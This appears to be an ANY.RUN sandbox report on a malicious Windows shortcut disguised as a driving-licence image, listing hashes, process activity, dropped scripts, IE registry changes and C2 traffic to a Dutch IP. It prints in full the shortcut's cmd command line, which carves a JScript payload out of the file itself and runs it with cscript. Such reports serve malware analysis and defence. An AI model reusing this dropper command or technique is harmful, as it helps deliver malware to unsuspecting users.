analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

drivig license.png.lnk

Full analysis: https://app.any.run/tasks/f9db8c0f-98ed-4e23-bac3-e33596b58899
Verdict: Malicious activity
Analysis date: June 19, 2019, 09:15:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=2, Archive, ctime=Tue Feb 13 03:43:24 2018, mtime=Tue Feb 13 03:43:24 2018, atime=Tue Feb 13 03:43:24 2018, length=302592, window=hidenormalshowminimized
MD5:

DBD6C4CB1F9B090AEC34723000A602AF

SHA1:

482533EB9A27E1F8D4BE5EAA5EF476571D9CA0E2

SHA256:

A462A146D86F78C73364D646FFFB8EF8CDE68E1E11FAFC89BC7B862E9B48DE6B

SSDEEP:

24576:sZUvLfsyzKVKwOwFhj/40hIPr9dTJU27eTEl3:sZVyzRQt4fdTJl7uEl3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes internet zones settings

      • reg.exe (PID: 1728)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3452)
    • Application launched itself

      • cmd.exe (PID: 3452)
      • cscript.exe (PID: 644)
      • cscript.exe (PID: 2448)
      • cscript.exe (PID: 3288)
    • Creates files in the user directory

      • cscript.exe (PID: 2448)
      • cscript.exe (PID: 3288)
      • cscript.exe (PID: 1976)
    • Executes scripts

      • cmd.exe (PID: 3452)
      • cscript.exe (PID: 2448)
      • cscript.exe (PID: 644)
      • cscript.exe (PID: 3288)
    • Executed via COM

      • DllHost.exe (PID: 2992)
      • iexplore.exe (PID: 1564)
    • Uses REG.EXE to modify Windows registry

      • cscript.exe (PID: 3288)
    • Modifies the phishing filter of IE

      • reg.exe (PID: 1728)
    • Connects to server without host name

      • iexplore.exe (PID: 304)
  • INFO

    • Manual execution by user

      • explorer.exe (PID: 284)
    • Creates files in the user directory

      • iexplore.exe (PID: 304)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 304)
      • iexplore.exe (PID: 1564)
    • Changes internet zones settings

      • iexplore.exe (PID: 1564)
    • Reads internet explorer settings

      • iexplore.exe (PID: 304)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 304)
    • Changes settings of System certificates

      • iexplore.exe (PID: 304)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString, TargetMetadata
FileAttributes: Archive
CreateDate: 2018:02:13 05:43:24+01:00
AccessDate: 2018:02:13 05:43:24+01:00
ModifyDate: 2018:02:13 05:43:24+01:00
TargetFileSize: 302592
IconIndex: 2
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
VolumeLabel: -
LocalBasePath: C:\Windows\System32\cmd.exe
RelativePath: ..\..\..\Windows\System32\cmd.exe
CommandLineArguments: /c path=%windir%\system32&&move "drivig license.png.lnk " "%tmp%\1.lnk"&forfiles /P "%tmp%" /M "driv*.lnk" /S /D 0 /C "%comspec% /c move @path %tmp%\1.lnk"&type "%tmp%\1.lnk"|find "BC7D">"%tmp%\0.js"|rd a||cSCripT "%tmp%\0.js"
IconFileName: %ProgramFiles%\Windows NT\Accessories\wordpad.exe
MachineID: win-11nvmud2d59
FillAttributes: 0x07
PopupFillAttributes: 0xf5
ScreenBufferSize: 1 x 1
WindowSize: 1 x 1
WindowOrigin: 65532 x 65532
FontSize: 8 x 12
FontFamily: Modern
FontWeight: 400
FontName: Terminal
CursorSize: 25
FullScreen: No
QuickEdit: No
InsertMode: Yes
WindowOriginAuto: No
HistoryBufferSize: 50
NumHistoryBuffers: 4
RemoveHistoryDuplicates: No
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
57
Monitored processes
15
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs forfiles.exe no specs cmd.exe no specs find.exe no specs cmd.exe no specs cscript.exe no specs PhotoViewer.dll no specs cscript.exe no specs cscript.exe no specs explorer.exe no specs reg.exe no specs reg.exe no specs cscript.exe no specs iexplore.exe iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
3452"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "drivig license.png.lnk " "C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"|find "BC7D">"C:\Users\admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2972forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"C:\Windows\system32\forfiles.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3080C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\admin\AppData\Local\Temp\1.lnk""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2036find "BC7D"C:\Windows\system32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3560C:\Windows\system32\cmd.exe /S /D /c" rd a"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2448cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"C:\Windows\system32\cscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2992C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
644"C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.jsC:\Windows\System32\cscript.execscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3288"C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Local\Temp\reportapi.jsC:\Windows\System32\cscript.execscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Version:
5.8.7600.16385
284"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 617
Read events
1 491
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
58
Unknown types
7

Dropped files

PID
Process
Filename
Type
1564iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
1564iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
304iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[1].txt
MD5:
SHA256:
304iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\google_com[1].txt
MD5:
SHA256:
3288cscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\Media.lnklnk
MD5:3273E4AF146B4F130AC763391D199CFB
SHA256:F40A9E22133B3FF31E1667E290F6AF6F333D227377EBC4A81EB209AD003258AF
2448cscript.exeC:\Users\admin\AppData\Local\Temp\drivig license.pngimage
MD5:CAEF19A73A018864968FD0D28A9BD2B0
SHA256:355EF09EE7A428A80E24F957A3C21680755FBD576EABD5C7F9B8DE688A92EBD8
3288cscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.regtext
MD5:BAF7479A1FFDDF4601EB6E7E86B6ECB7
SHA256:9FEE4514F8B3027AD045E67EE8D80317DD2AFBF7A996C97F47C216EAD011B070
2036find.exeC:\Users\admin\AppData\Local\Temp\0.jstext
MD5:615324F675BC8325A3E03EA30E237B10
SHA256:DEA6225507902F36DAA1119E9ADD68EAAADAEC867B67218B432051C1EBFF8210
2448cscript.exeC:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.jstext
MD5:615324F675BC8325A3E03EA30E237B10
SHA256:DEA6225507902F36DAA1119E9ADD68EAAADAEC867B67218B432051C1EBFF8210
644cscript.exeC:\Users\admin\AppData\Local\Temp\reportapi.jstext
MD5:615324F675BC8325A3E03EA30E237B10
SHA256:DEA6225507902F36DAA1119E9ADD68EAAADAEC867B67218B432051C1EBFF8210
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
25
DNS requests
13
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
304
iexplore.exe
GET
200
185.161.209.143:80
http://185.161.209.143/tran/check.php?id=&ver=3.4
NL
text
39 b
malicious
304
iexplore.exe
POST
200
185.161.209.143:80
http://185.161.209.143/tran/view.php
NL
text
32 b
malicious
304
iexplore.exe
POST
200
185.161.209.143:80
http://185.161.209.143/tran/register.php
NL
text
37 b
malicious
304
iexplore.exe
GET
404
185.161.209.143:80
http://185.161.209.143/favicon.ico
NL
html
209 b
malicious
304
iexplore.exe
GET
404
185.161.209.143:80
http://185.161.209.143/favicon.ico
NL
html
209 b
malicious
1564
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
304
iexplore.exe
GET
302
172.217.16.196:80
http://www.google.com/
US
html
231 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1564
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
304
iexplore.exe
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious
304
iexplore.exe
172.217.16.196:443
www.google.com
Google Inc.
US
whitelisted
304
iexplore.exe
104.25.162.10:443
x.dpstatic.com
Cloudflare Inc
US
shared
304
iexplore.exe
151.101.64.133:443
raw.githubusercontent.com
Fastly
US
suspicious
304
iexplore.exe
104.24.28.23:443
www.digitalpoint.com
Cloudflare Inc
US
shared
304
iexplore.exe
172.217.16.196:80
www.google.com
Google Inc.
US
whitelisted
104.24.28.23:443
www.digitalpoint.com
Cloudflare Inc
US
shared
304
iexplore.exe
172.217.22.78:443
www.google-analytics.com
Google Inc.
US
whitelisted
304
iexplore.exe
93.184.220.70:443
pbs.twimg.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.google.com
  • 172.217.16.196
whitelisted
raw.githubusercontent.com
  • 151.101.0.133
  • 151.101.64.133
  • 151.101.128.133
  • 151.101.192.133
shared
www.digitalpoint.com
  • 104.24.28.23
  • 104.24.29.23
unknown
forums.digitalpoint.com
  • 104.24.28.23
  • 104.24.29.23
unknown
x.dpstatic.com
  • 104.25.162.10
  • 104.25.163.10
unknown
connect.facebook.net
  • 185.60.216.19
whitelisted
www.google-analytics.com
  • 172.217.22.78
whitelisted
www.facebook.com
  • 185.60.216.35
whitelisted
stats.g.doubleclick.net
  • 173.194.76.155
  • 173.194.76.157
  • 173.194.76.156
  • 173.194.76.154
whitelisted

Threats

PID
Process
Class
Message
304
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] JS/Nemucod.N1!Eldorado
No debug info